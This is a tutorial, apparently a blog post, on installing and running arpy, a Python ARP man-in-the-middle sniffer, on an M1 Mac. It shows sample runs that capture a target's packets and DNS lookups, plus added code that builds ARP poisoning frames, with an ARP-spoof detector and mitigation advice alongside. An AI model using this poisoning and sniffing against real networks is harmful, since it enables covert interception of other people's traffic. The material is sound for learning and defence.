# Mac M1 ARP Sniffing Tool: arpy
# 1 Introduction
Arpy is an ARP sniffing tool written in Python. It is only a little over 200 lines long and performs the ARP attack through scapy. In a real engagement it is probably less convenient than the established ARP tools, but it is a good example for learning how such a tool works. One highlight is that, combined with Gource, it can render the LAN's DNS query history as an animated log.
Function
- packet sniffing
- DNS query sniffing
- Gource rendering of the captured query log
Modules
- python
- gource
- scapy
- libdnet
- libpcap
# 2 Environment
- Hardware: Apple M1
- System: macOS Monterey 12.5
- Installed:
  - Xcode
  - Homebrew
  - MacPorts (port)
# 3 Install
1. python
arpy.py has to be run under Python 2; otherwise it fails at startup with the following error:
```text
  File "arpy.py", line 144
    print tcpdata
                ^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(xxx)?
```
Fortunately this error is easy to fix. arpy.py was written for Python 2, where `print` is a statement; Python 3 turned it into a function. Early Python 3 releases only reported "invalid syntax" for this, which was ambiguous because invalid syntax can have many causes, so Python later added the dedicated "Missing parentheses" message to point users at the fix. To run the script under Python 3, wrap every printed value in parentheses, i.e. `print xxx` -> `print(xxx)`. Note that under Python 3 the sniffed payloads are then printed as `bytes` objects, which is why the verification output below shows a `b'...'` prefix.
```shell
# python2 (MacPorts)
sudo -i
port install py27-pip
port select --set pip2 pip27
# python3 (Homebrew)
brew install python@3.10
brew install pip-tools
```
2. gource
```shell
brew install boost glew sdl2_image gource
```
3. scapy
```shell
# Method.01: default pip2
# pip install scapy
pip2 install scapy
# Method.02: pip3
pip3 install scapy
# Method.03: recommended, current source tree
git clone https://github.com/secdev/scapy.git
cd scapy
python3 setup.py install
```
4. libdnet
```shell
# Method.01: brew
brew install libdnet
# Method.02: port
sudo -i
port install libdnet
```
5. libpcap
```shell
brew install libpcap
# libpcap is keg-only in Homebrew (macOS ships its own copy), so put the brew build on PATH.
# Note the '>>': a single '>' would overwrite your whole ~/.zshrc.
echo 'export PATH="/opt/homebrew/opt/libpcap/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc
```
6. arpy
```shell
# Method.01
git clone https://github.com/ivanvza/arpy.git
cd arpy
cp arpy.py <target dir>/arpy.py
cd <target dir>/
```
After obtaining arpy.py we still could not run it, whether under python2 or python3 and with root privileges; we get the following error:
```text
  File "/opt/local/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/bpf/core.py", line 155, in attach_filter
    raise Scapy_Exception("Can't attach the BPF filter !")
scapy.error.Scapy_Exception: Can't attach the BPF filter !
```
From ref1 and ref2 I learned:
- The guess is that Scapy cannot detect en0's link type in order to set up an 802.11 filter, because it treats en0 as an Ethernet 802.3 interface;
- Configure Scapy's optional library libpcap and set `conf.use_pcap = True` at runtime.
Since I don't know Python, I simply set `scapy.conf.use_pcap = True` inside `def main()` of arpy.py:
```python
def main():
    try:
        # switch scapy from its native BPF backend to libpcap before any sniff()/send() call
        if scapy.conf.use_pcap != 1:
            scapy.conf.use_pcap = True
```
7. Verification
```text
➜ arpy git:(master) ✗ sudo python3 arpy.py -t 192.168.221.182 -g 192.168.221.191 -i en0 --sniff
Password:
WARNING: No IPv4 address found on anpi0 !
WARNING: No IPv4 address found on anpi1 !
WARNING: more No IPv4 address found on en3 !
 _____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
[Info] Starting Sniffer...
[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.221.182 or dst host 192.168.221.182))
Target DNS FQDN
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.255
b'P\x02}\xcd=\x02192.168.221.255\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"B36EB09F62D4A7141AA9A0B133E29A211372A51D49D433375E662B963B47B7B3\\"}","devicename":"daochi","hicomversion":"3.1.0.0","mode":1,"deviceHash":"70086000200769327","serviceData":"","extendServiceData":"","wlanIp":"192.168.221.182","capabilityBitmap":[71],"type":14,"coapUri":"coap://192.168.221.182/device_discover"}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02j\x95=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02j\x95=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.255
b'P\x02)*=\x02192.168.221.255\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"B36EB09F62D4A7141AA9A0B133E29A211372A51D49D433375E662B963B47B7B3\\"}","devicename":"daochi","hicomversion":"3.1.0.0","mode":1,"deviceHash":"70086000200769327","serviceData":"","extendServiceData":"","wlanIp":"192.168.221.182","capabilityBitmap":[71],"type":14,"coapUri":"coap://192.168.221.182/device_discover"}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02I?=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02I?=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.255
b'P\x02\xd4\xf1=\x02192.168.221.255\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"B36EB09F62D4A7141AA9A0B133E29A211372A51D49D433375E662B963B47B7B3\\"}","devicename":"daochi","hicomversion":"3.1.0.0","mode":1,"deviceHash":"70086000200769327","serviceData":"","extendServiceData":"","wlanIp":"192.168.221.182","capabilityBitmap":[71],"type":14,"coapUri":"coap://192.168.221.182/device_discover"}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02\xb2\xfe=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02\xb2\xfe=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.191
b'`A\xb2\xfe'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.191
b'`A\xb2\xfe'
```
At this point you can happily use arpy.py for practice.
Of course, if you would rather use a ready-made version, you can pull the code directly from my fork:
```shell
git clone https://github.com/szc3h9/arpy.git
```
# usage
# Sample Commands
```text
ivanvza:~/ > sudo arpy
 _____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>
ARP MiTM Tool
Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        The Target IP
  -g GATEWAY, --gateway=GATEWAY
                        The Gateway
  -i INTERFACE, --interface=INTERFACE
                        Interface to use
  --tcp                 Filters out only tcp traffic
  --udp                 Filters out only udp traffic
  -d D_PORT, --destination_port=D_PORT
                        Filter for a destination port
  -s S_PORT, --source_port=S_PORT
                        Filter for a source port
  --sniff               Sniff all passing data
  --sniff-dns           Sniff only searched domains
  --sniff-dns-gource    Output target's DNS searches in gource format
  -v                    Verbose scapy packet print
```
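The `-t` and `-g` options name the two hosts whose ARP caches get poisoned. The following is an added example, not arpy's own code (arpy builds these frames with scapy's ARP layer): it assembles the two "is-at" replies by hand with `struct` so the wire layout is visible, decodes them back, and adds the defender's check for the same attack, a watcher that flags an IP suddenly claimed by a different MAC. The MAC addresses are made up; the IPs are the target and gateway from the verification run above.

```python
"""Added example (not arpy's code): hand-built ARP poison frames and a detector."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet (14 B) + ARP (28 B) 'is-at' reply: '<sender_ip> is at <sender_mac>',
    unicast to target_mac. Spoofing means putting the attacker's MAC in sender_mac
    next to somebody else's IP; most stacks update their cache without having asked."""
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen 6, plen 4
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return ethernet + arp


def parse_arp(frame):
    """Decode an ARP-over-Ethernet frame into its fields; raises on anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP-over-Ethernet frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol types")
    return {
        "op": op,
        "eth_dst": mac_str(frame[0:6]), "eth_src": mac_str(frame[6:12]),
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
    }


def poison_pair(attacker_mac, target_ip, target_mac, gateway_ip, gateway_mac):
    """The two frames of one poisoning round: the target is told the gateway lives at
    the attacker's MAC, and the gateway is told the same about the target. With IP
    forwarding enabled (sysctl net.inet.ip.forwarding=1 on macOS) both directions
    then pass through the attacker, where --sniff reads them."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, target_mac, target_ip),
        build_arp_reply(attacker_mac, target_ip, gateway_mac, gateway_ip),
    ]


class ArpWatch:
    """Defender side: remember which MAC first claimed each IP and flag any change."""

    def __init__(self):
        self.owner = {}

    def observe(self, frame):
        p = parse_arp(frame)
        known = self.owner.setdefault(p["sender_ip"], p["sender_mac"])
        if known != p["sender_mac"]:
            return f"{p['sender_ip']} was {known}, now claimed by {p['sender_mac']} (op={p['op']})"
        return None


def demo():
    """Constructed traffic: both hosts answer honestly, then the attacker poisons; returns the alerts."""
    gw_ip, gw_mac = "192.168.221.191", "00:11:22:33:44:55"      # MACs are made up
    tgt_ip, tgt_mac = "192.168.221.182", "11:22:33:44:55:66"
    attacker_mac = "aa:bb:cc:dd:ee:ff"
    frames = [build_arp_reply(gw_mac, gw_ip, tgt_mac, tgt_ip),
              build_arp_reply(tgt_mac, tgt_ip, gw_mac, gw_ip)]
    frames += poison_pair(attacker_mac, tgt_ip, tgt_mac, gw_ip, gw_mac)
    watch = ArpWatch()
    return [alert for alert in (watch.observe(f) for f in frames) if alert]


if __name__ == "__main__":
    for line in demo():
        print("ALERT:", line)
```

Sending the frames from `poison_pair` needs a raw socket and root, exactly as arpy does; the watcher only needs to see the frames, so it can run on a mirror port or on the gateway itself. A static ARP entry for the gateway on the client is the usual mitigation once the conflict is confirmed.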
# Packet Sniff
This is the packet sniffer, it allows you to see your target's traffic.
```text
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
 _____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
[Info] Starting Sniffer...
[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
[Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: ivanvza.ninja
Accept: */*
[Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2719538271"
Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
Content-Length: 3213
Date: Fri, 29 May 2015 20:15:06 GMT
Server: Microsoft IIS
<html>
<title>><></title>
<body>
<pre style="line-height: 1.25; white-space: pre;">
\ SORRY /
\ /
\ This page does /
] not exist yet. [ ,'|
] [ / |
]___ ___[ ,' |
] ]\ /[ [ |: |
] ] \ / [ [ |: |
] ] ] [ [ [ |: |
] ] ]__ __[ [ [ |: |
] ] ] ]\ _ /[ [ [ [ |: |
] ] ] ] (#) [ [ [ [ :===='
] ] ]_].nHn.[_[ [ [
] ] ] HHHHH. [ [ [
] ] / `HH("N \ [ [
]__]/ HHH " \[__[
] NNN [
] N/" [
] N H [
/ N \
/ q, \
/ \
</pre>
<h3 id="list"><h3>
</body>
<script>
// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||
```
# DNS Sniff
This function allows you to see domain names that your target is currently requesting.
```text
ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
 _____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
- @viljoenivan
[Info] Starting DNS Sniffer...
[Info] Enabling IP Forwarding...
[Info] Done...
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
```
# DNS Sniff With Gource
This function is more or less the same as the above, however it provides the functionality to pass it through Gource to get a live feed of what your target is viewing.
```text
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
[INFO] For a live gource feed run this command in parallel with this one:
tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
```
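Both `--sniff-dns` and `--sniff-dns-gource` do the same thing with a captured UDP/53 payload: pull the queried name out of the question section and print it in one of two formats. The following is an added example, not arpy's code (arpy uses scapy's DNS layer), written in plain Python so it runs without scapy. The query bytes are constructed here; the "Target: ... has searched for:" line copies arpy's format from the output above, while the Gource path layout (domain labels reversed into a path) is my own choice for grouping the animation by domain. The name parser follows compression pointers with a hop limit so a crafted packet cannot loop the sniffer.

```python
"""Added example (not arpy's code): DNS question parsing and the two output formats."""
import struct
import time


def build_dns_query(name, txid=0x1234, qtype=1):
    """Constructed sample: a recursive A query as a stub resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set; one question
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)       # class IN


def read_name(msg, offset):
    """Walk a DNS name at msg[offset:], following 0xC0xx compression pointers with a
    hop limit. Returns the dotted name with trailing '.', the way scapy prints it,
    and the offset just after the name in the original (un-jumped) stream."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels) + ".", end if end is not None else offset


def queried_names(payload):
    """(name, qtype) pairs from the question section of a DNS query; responses yield []."""
    flags, qdcount = struct.unpack("!HH", payload[2:6])
    if flags & 0x8000:                      # QR bit set: this is an answer, not a query
        return []
    names, offset = [], 12
    for _ in range(qdcount):
        name, offset = read_name(payload, offset)
        qtype, _qclass = struct.unpack("!HH", payload[offset:offset + 4])
        offset += 4
        names.append((name, qtype))
    return names


def sniff_dns_lines(src_ip, dst_ip, payload):
    """The --sniff-dns style line, one per question."""
    return [f"Target: {src_ip} -> ({dst_ip}/DNS server) has searched for: {name}"
            for name, _ in queried_names(payload)]


def gource_lines(src_ip, payload, ts=None):
    """Gource custom log format: unix_timestamp|user|A/M/D|path. The querying host is
    the 'user'; www.youtube.com becomes /com/youtube/www so Gource clusters by domain."""
    ts = int(time.time() if ts is None else ts)
    out = []
    for name, _ in queried_names(payload):
        path = "/" + "/".join(reversed(name.rstrip(".").split(".")))
        out.append(f"{ts}|{src_ip}|A|{path}")
    return out


if __name__ == "__main__":
    pkt = build_dns_query("www.youtube.com")
    print("\n".join(sniff_dns_lines("192.168.1.4", "192.168.1.1", pkt)))
    print("\n".join(gource_lines("192.168.1.4", pkt)))
```

The lines from `gource_lines` are what you would append to the file that the `tail -f ... | gource --log-format custom -` pipeline above reads; Gource animates each appended path as it arrives.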
# Sample Gource footage
# To-do
- Look at adding sslstrip.
- Port it to Kali.